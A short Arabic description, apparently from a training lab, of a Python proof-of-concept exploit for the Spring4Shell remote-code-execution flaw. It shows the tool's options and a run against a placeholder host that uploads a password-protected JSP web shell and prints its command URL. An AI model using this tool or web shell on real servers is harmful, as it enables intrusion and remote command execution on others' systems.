
أداة استغلال (PoC) مبنية على بايثون لـ CVE-2022-22965 (Spring4Shell) تستهدف ثغرة تنفيذ الأوامر عن بُعد (RCE) في Java Spring Core على Apache Tomcat. تقوم بتحميل ويب شيل JSP مع حماية بكلمة مرور لتنفيذ الأوامر عن بُعد.
تؤثر هذه الثغرات على مكون "Spring Core" — قلب الإطار
الشروط الحالية للثغرة:-
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url
Spring4Shell RCE Proof of Concept
positional arguments:
url Target URL
optional arguments:
-h, --help show this help message and exit
-f FILENAME, --filename FILENAME
Name of the file to upload (Default tomcatwar.jsp)
-p PASSWORD, --password PASSWORD
Password to protect the shell with (Default: thm)
-d DIRECTORY, --directory DIRECTORY
The upload path for the file (Default: ROOT)
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!
# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami